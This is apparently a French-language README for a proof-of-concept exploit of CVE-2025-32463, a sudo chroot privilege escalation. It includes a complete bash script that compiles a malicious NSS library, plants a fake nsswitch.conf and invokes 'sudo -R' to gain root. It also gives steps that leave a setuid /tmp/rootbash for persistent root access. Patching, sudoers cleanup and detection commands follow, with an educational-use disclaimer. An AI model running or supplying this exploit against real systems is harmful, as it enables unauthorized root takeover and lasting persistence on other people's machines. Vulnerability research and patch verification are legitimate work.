
Exploit d'escalade de privilèges local pour CVE-2025-32463 ciblant une faille de conception dans sudo chroot. Fournit un script PoC, une analyse technique et des conseils d'atténuation pour les versions affectées de sudo 1.9.14-1.9.17.
CVE-2025-32463 est une vulnérabilité critique d'escalade de privilèges locaux dans les versions de sudo 1.9.14 à 1.9.17. Cette vulnérabilité permet aux attaquants disposant de privilèges sudo d'escalader vers un accès root en exploitant un défaut de conception dans la logique de traitement de l'option chroot.
La vulnérabilité survient en raison d'un problème de synchronisation dans le processus de validation de sécurité de sudo. La fonction pivot_root est exécutée avant la vérification de la politique de sécurité, permettant aux attaquants de manipuler l'environnement du système de fichiers que sudo utilise pour l'authentification et l'autorisation.
nsswitch.conf malveillantpivot_root : Exécutée trop tôt dans le processusset_cmnd_path : Opère dans l'environnement manipulécommand_matches : Les contrôles de sécurité sont contournés en raison de la manipulation de l'environnementAvant d'utiliser cet exploit, assurez-vous que les conditions suivantes sont remplies :
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
chmod +x cve-2025-32463.sh
./cve-2025-32463.sh
Vérifiez si le système cible est vulnérable :
# Check sudo version
sudo --version
# Check sudo privileges
sudo -l
# Look for chroot-related permissions
sudo -l | grep chroot
Le script d'exploit principal (cve-2025-32463.sh) :
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF
mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c
echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest
# Cleanup
rm -rf ${STAGE?}
Après une exploitation réussie, vérifiez l'accès root :
# Check current privileges
whoami
# Check proof file
cat /tmp/pwned_proof.txt
# Use setuid bash for persistent root access
/tmp/rootbash -p
Mettez à jour sudo vers la version 1.9.17p1 ou ultérieure :
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
# or
sudo dnf update sudo
Supprimez les directives chroot du fichier sudoers (solution temporaire) :
# Backup current configuration
sudo cp /etc/sudoers /etc/sudoers.backup
# Remove chroot-related entries
sudo sed -i '/chroot/d' /etc/sudoers
# Verify syntax
sudo visudo -c
Surveillez les tentatives d'exploitation :
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d
# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo
# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f
La vulnérabilité provient d'un défaut de conception dans le flux d'exécution de sudo :
Flux normal attendu :
Flux vulnérable réel :
L'exploit exploite le système Name Service Switch (NSS) :
/etc/nsswitch.conf pour l'authentification utilisateurCet exploit a été testé sur :
⚠️ AVERTISSEMENT IMPORTANT ⚠️
Cet outil est fourni uniquement à des fins éducatives et de tests autorisés.
Les contributions sont les bienvenues ! Veuillez :
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Remarque : Cette vulnérabilité affecte un composant système critique. Veuillez l'utiliser de manière responsable et assurez-vous que tous les tests sont autorisés.